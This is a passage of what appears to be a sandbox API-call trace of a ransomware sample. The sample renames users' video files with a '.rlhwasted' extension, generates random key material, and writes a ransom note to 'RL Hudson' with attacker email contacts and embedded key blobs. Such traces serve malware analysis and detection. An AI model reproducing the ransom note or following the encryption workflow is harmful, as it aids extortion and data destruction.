[0198.187] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Q3HhE1Uu5V5N3a1CdNbF7mk9mCnCoVCtmRKMhV0pUJ34H8+QkwNfp5DNyngXQ7Vh\r\nm0RELc+0CCLbhsj3E7SGGB7gs2BSDxS0VRPfTwIp3LDMExjzhj3M0Z1+NVuNLmXx\r\nIBVmddEiHR3bT3Nbxc9q2vOWG3ayiA19oNvxiOdpB3vbUDLv4cDDPtYh5FMu+g8G\r\nZvg2YPRGR609FN766TVFdIZlyRizXanJvnLcw4X0TVKSQdJz4L1MQMZAssseUT+z\r\nJl7HdFVMChVYwd/XAWYeuafklu/7lQnrFMVUntYYAbSDpEMqRsCTmXFe2SasGw8p\r\nESk7hP0dCiQ97oN+fpiBeHp8y7VIKe5WtjpF9I45pbz/nENtHDnxnEHhSAjZJ2dl\r\nVxyTMgJCPWgWWMuBQH7Chr81gYmuSBWMTm8azERONl8SKiI1sGfLAEN07rgcyiRw\r\njDdjGqJodgkaMeNwflfaKWazbd7CV+y5tXPG2uCezD8Lx9ETMVUttj1LJDCgcLlE\r\n12aVerfdrmoUp1BNdS3pWqklv2DJS/OCvGuRyRdar90XPCVj5IpnnpB9lS775qhq\r\n+fDpQgzUSu6/jror8deb+/ujBtMAmz9w/jUIyecY1EYyiHqlhoUvWjaMSJCrUSyj\r\nbLWwIZr+aRGgqSw9FDIFRhieDsednxhILpAvyj0j7Q4=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.187] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.187] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.187] SetEndOfFile (hFile=0x104) returned 1 [0198.190] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.190] CloseHandle (hObject=0x104) returned 1 [0198.239] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.239] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704ac0 | out: hHeap=0x6b0000) returned 1 [0198.239] _aulldvrm () returned 0x0 [0198.239] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.240] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.240] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\UskMbBHkEAZjy.avi") returned 95 [0198.241] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c8) returned 0x6e8978 [0198.241] lstrcpyW (in: lpString1=0x6e8a36, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.241] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.241] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.242] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.242] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\UskMbBHkEAZjy.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\uskmbbhkeazjy.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.243] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.244] SetEndOfFile (hFile=0x104) returned 1 [0198.244] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.244] lstrcpyW (in: lpString1=0x6e8a36, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\UskMbBHkEAZjy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\uskmbbhkeazjy.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\UskMbBHkEAZjy.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\uskmbbhkeazjy.avi.rlhwasted")) returned 1 [0198.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\UskMbBHkEAZjy.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\uskmbbhkeazjy.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.246] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.246] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x166d3 [0198.246] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x166d3) returned 0xb00000 [0198.246] CloseHandle (hObject=0x10c) returned 1 [0198.252] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.253] CloseHandle (hObject=0x128) returned 1 [0198.253] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.253] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.254] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.254] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.255] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.256] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.256] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0198.267] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.267] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FCj7gpotYmt25+IjJ33xXb83lix3OZLQGqK1V2AX5ekG+I91nezqCY+bDjAm8Wxm\r\n9RiYjan6rjkVFD2wAT5mWvOJ2ZA+IzzIaM0b715thvPdTmKa2DifPHzPCsME0z6j\r\n4txehJ88t88vM9qj9PsOnubvMkmnrKG2DfDTS3ZLz29Sr69Z+om6schC8izLcoiG\r\n7qviU4aL+zPbQ5dWb2wr9ooqcLIqA03fgR758hNDG7CuE57y+NxSu3nwBYAmqStg\r\nxmbYi2sJiqKeJAJjP+XASqudhfIHohz1Lriz4ZUXiDiHdqIzQ/WBlYZpCrYPcLtu\r\nnxpK4GuPTs56Zebj4HwGDgVxUSr9boVDUIrmuSJbdNMs4Ta8EKGePI0E0akG+F5u\r\nY9tbLm8mOpsvEBtERiZvBLZH2DbTum3IocARzTtoOgLnt/YCziHO+/RkIul4phC+\r\nj3acKF7KxE71cnxWOsHmld6exhWgh7wr6Dm3ZN5LfZOTckXLtLrCEVnl00sjl151\r\npRhYgFA/EQ/3VRhSpEakYkEYNxKz8Cb1z9C0ZTtSagGgrw8eThM+Xx+Cc2JFBalT\r\nQ2xfQAltRfwL/2PsKMtYOsl9oGFbA55zzxa/WKfIeosgCbSs4PbB/R1TjZaGF56o\r\n49TwdnKHy36XUnKWRY14YGqfH8zB5XuaeL380erdpon=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.267] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0198.267] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.267] SetEndOfFile (hFile=0x104) returned 1 [0198.271] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.271] CloseHandle (hObject=0x104) returned 1 [0198.273] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.273] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fe8 | out: hHeap=0x6b0000) returned 1 [0198.273] _aulldvrm () returned 0x0 [0198.273] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.274] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.274] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\wOwLAiDC_RK0Zvfr.avi") returned 98 [0198.274] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ce) returned 0x6e8978 [0198.274] lstrcpyW (in: lpString1=0x6e8a3c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.275] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.275] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.276] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.276] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\wOwLAiDC_RK0Zvfr.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\wowlaidc_rk0zvfr.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.277] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.278] SetEndOfFile (hFile=0x104) returned 1 [0198.278] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.278] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.278] lstrcpyW (in: lpString1=0x6e8a3c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\wOwLAiDC_RK0Zvfr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\wowlaidc_rk0zvfr.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\wOwLAiDC_RK0Zvfr.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\wowlaidc_rk0zvfr.avi.rlhwasted")) returned 1 [0198.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\wOwLAiDC_RK0Zvfr.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\wowlaidc_rk0zvfr.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.280] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.280] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x16056 [0198.280] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16056) returned 0xb00000 [0198.280] CloseHandle (hObject=0x128) returned 1 [0198.334] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.335] CloseHandle (hObject=0x10c) returned 1 [0198.335] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.335] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.336] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.336] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.336] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.337] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.337] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.348] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.349] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.349] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.349] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WcRGePbZfJX+meOzwDM8j/jT6zHANpbIHkYLb42RUkvPA7Hk6n3pc5r2G1X3IcW4\r\nLh2BQCHQQuH6cnkMcpx2bh5z9eP7xytP5+ce2k+K1Awo9znVH9bzlrpcSQAsHHDz\r\nphhJbE4rya8c6vWcjonfMyJe9YESm/wd+wvwDxrPpWQQlbYSTklayn4agY4lS/QM\r\nFGLm3C5lJwH43TSpjYLkM8lygLtq4osn8B9REV6PCaBgdM0d9chezvSYKWQ6euWs\r\n8wAyo39LpUi/0xSCfXMUNb6gBaCA69D46QDSsusOuULog0TEojZbdF1IKN7d5W4p\r\nCi4sV93Oxwhu1eafSD3eOPuii5UuHukduQ4b+akVqSS6SK0P9lThNSvaHJ7MgpFC\r\nOeLV8vrc0a77NQXr2ZZYKFTDydhvy1IzyTK80nw55JN43UiCz3jRU5aRTPUIIuRv\r\nyVja0w+wubmEq6anvVRBrcBmgUPjoBV0lg4qPFZ1BhCPRM7DeXY3oCD7kdBbZCwT\r\nMrL3Sfm1oEbqLODrUn4pT8jeNE0UVgYvpEfRMByGFOVIxMNkrbbgDHGnHVXi30vr\r\n+fNy947asJRGNyMMiH2gvyfgKISV2Og53Np/Xx4V7RPJmmQ+6hZKOaZKJN2L1U2j\r\ncepUpxRm5vGdpchSpGALVl357zmnPk7OVFHGb0Zbq4d=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.349] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.349] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.349] SetEndOfFile (hFile=0x104) returned 1 [0198.352] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.352] CloseHandle (hObject=0x104) returned 1 [0198.354] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.354] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713100 | out: hHeap=0x6b0000) returned 1 [0198.354] _aulldvrm () returned 0x0 [0198.354] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.355] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.355] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\adAkRf.mkv") returned 72 [0198.355] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29a) returned 0x6e8978 [0198.355] lstrcpyW (in: lpString1=0x6e8a08, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.355] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.356] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.356] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0198.357] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\adAkRf.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\adakrf.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.357] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.359] SetEndOfFile (hFile=0x104) returned 1 [0198.359] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.359] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.359] lstrcpyW (in: lpString1=0x6e8a08, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\adAkRf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\adakrf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\adAkRf.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\adakrf.mkv.rlhwasted")) returned 1 [0198.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\adAkRf.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\adakrf.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.360] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0198.361] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x175e4 [0198.361] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x175e4) returned 0xb00000 [0198.361] CloseHandle (hObject=0x10c) returned 1 [0198.367] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.368] CloseHandle (hObject=0x108) returned 1 [0198.368] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8c20 [0198.368] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.369] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e8c68 | out: pbBuffer=0x6e8c68) returned 1 [0198.369] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.369] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.370] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.370] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.440] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8c20 | out: hHeap=0x6b0000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.440] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE 